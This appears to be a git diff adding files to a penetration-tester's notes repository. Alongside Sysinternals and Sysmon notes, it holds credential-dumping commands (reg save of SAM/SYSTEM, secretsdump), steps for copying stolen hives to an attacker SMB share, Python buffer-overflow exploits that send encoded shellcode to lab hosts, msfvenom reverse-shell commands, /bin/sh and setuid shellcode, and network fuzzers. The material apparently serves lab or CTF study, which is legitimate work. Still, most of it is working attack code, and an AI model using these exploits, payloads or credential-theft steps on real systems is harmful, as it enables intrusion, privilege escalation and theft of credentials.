a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality. + +``` +tcpview +tcpvcon +``` + +## Autoruns +Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. + +## Procdump +ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. + + +## Procdump +The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. + +## Procmon +Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. + +## Psexec +PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems + + +## Winobj +WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space. + +## BGInfo +It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more + +## RegJump +This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM). + +``` +regjump HKLM +``` +* Similar to +``` +reg query HKLM +``` +Get-Item +Get-ItemProperty +``` + +## Strings +Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters. diff --git a/enumeration/windows/sysmon.md b/enumeration/windows/sysmon.md new file mode 100644 index 0000000..5941b58 --- /dev/null +++ b/enumeration/windows/sysmon.md @@ -0,0 +1,63 @@ +# Sysmon +Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events. + +## Paths +* Logfiles +``` +Applications and Services Logs/Microsoft/Windows/Sysmon/Operational +``` + +## Configuration +* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config) +* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml) + +## Installation +```sh +Downloads-SysInternalsTools C:\Sysinternals +``` + +## Best Practices +* Exclude, not include events +* CLI gives further control over filters +```sh +Get-WinEvent +``` +```sh +wevutil.exe +``` +* Know the env before implementation + +## Filtering Events +* Actions -> Filter Current Log + +### Filtering Events with Powershell +* Logged Events containing port 4444 +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444' +``` +* Logged Events containing lsass.exe +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"' +``` +* Rats and C2 +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=' +``` + +## Evasion Techniques +* Alternate Data Streams +* Injections +* Masquerading +* Packing/Compression +* Recompiling +* Obfuscation +* Anti-Reversing Techniques +* Remote Thread (OpenThread, ResumeThread) + +### Detecting Evasion Techniques with Powershell +```sh +Get-WinEvent -Path -FilterXPath '*/System/EventID=15' +Get-WinEvent -Path -FilterXPath '*/System/EventID=8' +``` + + diff --git a/exfiltration/windows/loot.md b/exfiltration/windows/loot.md new file mode 100644 index 0000000..2dcfa77 --- /dev/null +++ b/exfiltration/windows/loot.md @@ -0,0 +1,14 @@ +# Loot Windows Credentials + +```sh +reg.exe save HKLM\SAM sam.bak +``` +```sh +reg.exe save HKLM\SYSTEM system.bak +``` + +* Exifiltrate and use impacket +```sh +examples/secretsdump.py -sam sam.bak -system system.bak LOCAL +``` + diff --git a/exfiltration/windows/smb_connection.md b/exfiltration/windows/smb_connection.md new file mode 100644 index 0000000..771ec6e --- /dev/null +++ b/exfiltration/windows/smb_connection.md @@ -0,0 +1,29 @@ +# Connect to Attacker SMB + +## Attacker +* Impacket smbserver on attacker +```sh +sudo examples/smbserver.py share . -smb2support -username -password +``` + +## Target +* Connect to attacker smb +```sh +net use \\\share /User: +``` +* Save data to attacker's smb +```sh +move sam.bak \\\share\sam.bak +move system.bak \\\share\system.bak +``` +* Disconnect +```sh +net use \\\share /del +``` + +## Workarounds + +* System Error 1312. User credentials need a domain +```sh +/USER:domain\user +``` diff --git a/exploit/buffer_overflow/bad_chars.py b/exploit/buffer_overflow/bad_chars.py new file mode 100755 index 0000000..a56d1a5 --- /dev/null +++ b/exploit/buffer_overflow/bad_chars.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python3 + +from __future__ import print_function +listRem = "\\x0a".split("\\x") +for x in range(1, 256): + if "{:02x}".format(x) not in listRem: + print("\\x" + "{:02x}".format(x), end='') +print() diff --git a/exploit/buffer_overflow/brainstorm.py b/exploit/buffer_overflow/brainstorm.py new file mode 100644 index 0000000..a7eaf98 --- /dev/null +++ b/exploit/buffer_overflow/brainstorm.py @@ -0,0 +1,65 @@ +import sys +import socket + +badchars = bytearray() +listRem = [0x00] +for x in range(1, 256): + if x not in listRem: + badchars.append(x) + +buf = b"" +buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29" +buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77" +buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c" +buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18" +buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5" +buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb" +buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda" +buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48" +buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7" +buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70" +buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f" +buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10" +buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7" +buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e" +buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90" +buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1" +buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83" +buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea" +buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b" +buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b" +buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93" +buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c" +buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab" +buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe" +buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8" +buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11" +buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea" + + +ip = "10.10.143.77" +port = 9999 + + +offset = 2012 +overflow = b"A" * offset +retn = b"\xdf\x14\x50\x62" #"BBBB" +padding = b"\x90" * 16 +payload = buf +postfix = b"" + + +buffer = overflow + retn + padding + payload + postfix + +try: + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.connect((ip, port)) + s.recv(2000) + s.send(b"pwnbot") + s.recv(2000) + print("Sending evil buffer...") + s.send(buffer) + print("Done!") + s.close() +except socket.error: + print("Could not connect: "+socket.error) diff --git a/exploit/buffer_overflow/buffer_overflow.py b/exploit/buffer_overflow/buffer_overflow.py new file mode 100755 index 0000000..c8e7c21 --- /dev/null +++ b/exploit/buffer_overflow/buffer_overflow.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python3 + +import socket + +ip = "10.10.122.155" +port = 31337 + +prefix = "" +offset = 146 +overflow = "A" * offset +# EIP return +#retn = "BBBB" +retn = "\xc3\x14\x04\x08" +padding = "\x90" * 16 +#padding = "" +#payload = "" +payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1" +payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4" +payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1" +payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44" +payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b" +payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5" +payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c" +payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb" +payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc" +payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b" +payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a" +payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66" +payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a" +payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34" +payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97" +payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a" +payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45" +payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93" +payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66" +payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29" +payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3" +payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb" +payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89" +payload += "\xef\xd9\x08\x3d\x0f\xc8"; + +#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" +postfix = "" +buffer = prefix + overflow + retn + padding + payload + postfix + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + s.connect((ip, port)) + print("[*] Sending buffer...") + s.send(bytes(buffer + "\r\n", "latin-1")) + print("Done!") +except: + print("Could not connect") diff --git a/exploit/buffer_overflow/docs/amd64.md b/exploit/buffer_overflow/docs/amd64.md new file mode 100644 index 0000000..82f4add --- /dev/null +++ b/exploit/buffer_overflow/docs/amd64.md @@ -0,0 +1,52 @@ +# amd64 + +* `rax` return value, caller saved. +* `r10`, `r11` are caller saved. +* `rbx`, `r12`, `r13`, `r14` are callee saved +* `rbp` is also callee saved(and can be optionally used as a frame pointer) +* `rsp` is callee saved + +## Function argument registers +* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved. +* Further function args are stored inside its stack frame. + + +## Overwriting Variables and Padding +* Overwrite an atomic variable behind a buffer +```C +int main ( int argc, char ** argv ) { + int var = 0 + char buffer[12]; + + gets(buffer); + [...] +} +``` +* Stack layout +``` +Bottom ++------------------+ +| Saved regsisters | ++------------------+ +| int var | ++------------------+ +| char buffer [11] | +| ... | +| ... | +| ... | +| char buffer [0] | ++------------------+ +| char ** argv | ++------------------+ +| char argc | ++------------------+ +Top +``` + +* Watch out! I.e., a 12 byte array is padded to system memory allocation size. +``` ++-------------+----+ +|12 byte array| 4b | ++-------------+----+ +0 12 16 byte +``` diff --git a/exploit/buffer_overflow/docs/buffer_overflow.md b/exploit/buffer_overflow/docs/buffer_overflow.md new file mode 100644 index 0000000..c08e81c --- /dev/null +++ b/exploit/buffer_overflow/docs/buffer_overflow.md @@ -0,0 +1,66 @@ +# Buffer Overflow +* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst) + +# Usage +* Fuzz & crash the binary pretty roughly via payload +```sh +python -c "print('A' * 3000) +``` + +## Fuzzing +* python 3 +../fuzzer.py + +* python 2 +../fuzzer2.py + +## Measure Offset +* Use as payload +```sh +/opt/metasploit/tools/exploit/pattern_create.rb -l +``` +* Find content of the payload at EIP and identify exact bufferlength +```sh +/opt/metasploit/tools/exploit/pattern_offset.rb -l -q +``` +``` +msf-pattern_offset -l -q +``` +``` +mona msfpattern -l +``` +* Fill offset variable in exploit `buffer_overflow.py` +../buffer_overflow.py + +* Execute buffer_overflow.py, EIP should contain `BBBB` + +## Find bad characters to input in the buffer +* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`. +../bad_chars.py + +* Compare stack if any bad chars block exectuion of the payload following in the next steps. +```sh +!mona bytearray -b "\x00" +!mona compare -f -a +``` + +## Find Jump Point / RoP +* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP` + +### Example: Immunity Debugger using mona on windows machine +```sh +!mona modules +``` +```sh +!mona jmp -r esp -m +``` +* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64 + +## Shellcode as Payload +* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py` +```sh +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f c -e x86/shikata_ga_nai -b "\x00" +msfvenom -p linux/x86/shell_reverse_tcp LHOST= -f c -e x86/shikata_ga_nai -b "\x00" +``` +* Prepend NOPs as padding before shellcode + diff --git a/exploit/buffer_overflow/docs/radare2.md b/exploit/buffer_overflow/docs/radare2.md new file mode 100644 index 0000000..5953ef1 --- /dev/null +++ b/exploit/buffer_overflow/docs/radare2.md @@ -0,0 +1,121 @@ +# Return Address reuse + +## via Shellcode, an examples +* Find out the address of the start of the buffer and the start address of the return address +* Calculate the difference between these addresses so you know how much data to enter to overflow +* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address + +* Plus NOPsled (sometimes xargs is needed in front of the app call) +```python +python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow +``` + +## Finding Offset +### via gdb segfault output +* 64 bit addresses use 6 out of 8 byte for addresses. +```sh +gdb ./application +run $(python -c "print('\x41' * 180)") +``` +* Return address hit completely when 6 bytes are filled. +```sh +Program received signal SIGSEGV, Segmentation fault. +0x0000414141414141 in copy_arg () +``` +* Buffer = measured_length - (`$rbp` + 6 bytes return address) + +### via metasploit +```sh +/opt/metasploit/tools/exploit/pattern_create.rb -l 180 +``` +* Looking for `rbp` Content in front of the return address to measure offset +```sh +(gdb) i r +[...] +rbp 0x 0x +[...] +``` +* Measure offset +```sh +pt/metasploit/tools/exploit/pattern_offset -l 180 -q +``` + +## Crafting Payload +* Contains Junk/NOPslice + shellcode + Junk over rbp + return address +* Inside gdb +```sh +run $(python -c "print('A' * 100 + + 'A' * 12 + 'B' * 6)") +``` +* Check actual stack +```sh +(gdb) x/100x $rsp-200 +0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff +0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff +0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141 +0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a +0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149 +[...] +``` +* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`. +## NopSled +* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`. +```sh +(gdb) x/100x $rsp-200 +0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff +0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff +0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090 +0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a +0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149 +``` +* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address +```sh +run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')") +``` + +## setuid() and setreuid() +* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed. +* `/bin/sh` checks real uid not effective uid +* ./shellcodes/setuid_shell.as + +### setreuid() in assembler +* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) +* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002. +* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`. +* ./shellcode/setreuid_shell.as +```sh +"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05" +``` +* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm) + +### setreuid() in shellcode using pwntools +* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner. +```sh +* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) +shellcraft -f d amd64.linux.setreuid +``` +* The uid can be set as an argument +```sh +shellcraft -f d amd64.linux.setreuid +``` +* Prepend this in front of the existing shellcode like this +```sh +run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')") +``` + * Where the existing shellcode is the following + ```sh + \x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05 + ``` + * Setreuid part is the following + ```sh + \x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05 + ``` diff --git a/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as b/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as new file mode 100644 index 0000000..ef1c822 --- /dev/null +++ b/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as @@ -0,0 +1,23 @@ +xor rdi,rdi <------ set the rdi to 0 +xor rax,rax +xor rsi, rsi <------ set the rsi to 0 +mov si, 1002 <------ put the value 1002 in the lower bits of the rsi +mov di, 1002 <------ put the value 1002 in the lower bits of the rdi +mov al,0x71 <------ put the setruid function in the al register +syscall <------ call the function. +xor rdx,rdx +movabs rbx,0x68732f6e69622fff +shr rbx,0x8 +push rbx +mov rdi,rsp +xor rax,rax +push rax +push rdi +mov rsi,rsp +mov al,0x3b +syscall +push 0x1 +pop rdi +push 0x3c +pop rax +syscall diff --git a/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as b/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as new file mode 100644 index 0000000..70387ca --- /dev/null +++ b/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as @@ -0,0 +1,37 @@ +etuid(0) + execve(/bin/sh) - just 4 fun. +xi4oyu [at] 80sec.com + +main(){ +__asm( "xorq %rdi,%rdi\n\t" + "mov $0x69,%al\n\t" + "syscall \n\t" + "xorq %rdx, %rdx \n\t" + "movq $0x68732f6e69622fff,%rbx; \n\t" + "shr $0x8, %rbx; \n\t" + "push %rbx; \n\t" + "movq %rsp,%rdi; \n\t" + "xorq %rax,%rax; \n\t" + "pushq %rax; \n\t" + "pushq %rdi; \n\t" + "movq %rsp,%rsi; \n\t" + "mov $0x3b,%al; \n\t" + "syscall ; \n\t" + "pushq $0x1 ; \n\t" + "pop %rdi ; \n\t" + "pushq $0x3c ; \n\t" + "pop %rax ; \n\t" + "syscall ; \n\t" +); +} +*/ +main() { + char shellcode[] = + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" + "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" + "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" + "\x58\x0f\x05"; + (*(void (*)()) shellcode)(); +} + +2009-05-14 +evil.xi4oyu diff --git a/exploit/buffer_overflow/fuzzer.py b/exploit/buffer_overflow/fuzzer.py new file mode 100755 index 0000000..6bc6480 --- /dev/null +++ b/exploit/buffer_overflow/fuzzer.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python +import sys, time, socket + +ip = "192.168.56.102" +port = 31337 +timeout = 5 +prefix = "" +counter = 100 + +string = prefix + "A" * counter +while True: + try: + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.connect((ip, port)) + print ('[+] Sending buffer') + #s.recv(1024) + print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + s.send(bytes(string + '\r\n', "latin1")) + s.recv(1024) + except: + print ("[!] The program can't be reached") + sys.exit(0) + string += counter * 'A' + time.sleep(1) diff --git a/exploit/buffer_overflow/fuzzer2.py b/exploit/buffer_overflow/fuzzer2.py new file mode 100644 index 0000000..c46e581 --- /dev/null +++ b/exploit/buffer_overflow/fuzzer2.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2 +import sys,socket +import time + +address = '192.168.56.102' +port = 9999 +buffer = ['A'] +counter = 100 +while len(buffer) < 10: + buffer.append('A'*counter) + counter=counter+100 +try: + for string in buffer: + print '[+] Sending %s bytes...' % len(string) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connect=s.connect((address,port)) + s.send(string + '\r\n') + s.recv(1024) + print '[+] Done' +except: + print '[!] Unable to connect to the application. You may have crashed it.' + sys.exit(0) +finally: + s.close() diff --git a/exploit/buffer_overflow/fuzzer_BO.py b/exploit/buffer_overflow/fuzzer_BO.py new file mode 100755 index 0000000..b098066 --- /dev/null +++ b/exploit/buffer_overflow/fuzzer_BO.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python3 + +import socket, time, sys + +ip = "10.10.161.147" +port = 9999 +timeout = 5 +prefix = "" + +string = prefix + "A" * 100 + +while True: + try: + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.settimeout(timeout) + s.connect((ip, port)) + s.recv(1024) + s.recv(1024) + s.send("User" '\r\n') + #print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + s.send(bytes(string, "latin-1")) + s.recv(1024) + s.send(string + '\r\n') + #print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + print(f"fuzzing with {len(string)} bytes") + except: + #print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) + sys.exit(0) + string += 100 * "A" + time.sleep(1) + diff --git a/exploit/buffer_overflow/peda b/exploit/buffer_overflow/peda new file mode 160000 index 0000000..84d38bd --- /dev/null +++ b/exploit/buffer_overflow/peda @@ -0,0 +1 @@ +Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43 diff --git a/exploit/buffer_overflow/pwn_fuzz.py b/exploit/buffer_overflow/pwn_fuzz.py new file mode 100644 index 0000000..55c0c18 --- /dev/null +++ b/exploit/buffer_overflow/pwn_fuzz.py @@ -0,0 +1,8 @@ +import pwn + +r = pwn.remote("10.10.156.228", 9999) +r.recvuntil(":") +r.send("User\r\n") +r.recvuntil(":") +r.send(b'A' * 2200) +r.recvuntil("message:") diff --git a/exploit/python/pwntools.md b/exploit/python/pwntools.md new file mode 100644 index 0000000..9384c4f --- /dev/null +++ b/exploit/python/pwntools.md @@ -0,0 +1,3 @@ +# Pwntools + +* [Docs](https://docs.pwntools.com/en/stable/) diff --git a/exploit/python/scapy.md b/exploit/python/scapy.md new file mode 100644 index 0000000..dcd3101 --- /dev/null +++ b/exploit/python/scapy.md @@ -0,0 +1,4 @@ +# Scapy + +* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html) + diff --git a/exploit/samba/smbmap b/exploit/samba/smbmap new file mode 160000 index 0000000..5c98c5f --- /dev/null +++ b/exploit/samba/smbmap @@ -0,0 +1 @@ +Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003 diff --git a/exploit/samba/smbmap.md b/exploit/samba/smbmap.md new file mode 100644 index 0000000..505eaec --- /dev/null +++ b/exploit/samba/smbmap.md @@ -0,0 +1,12 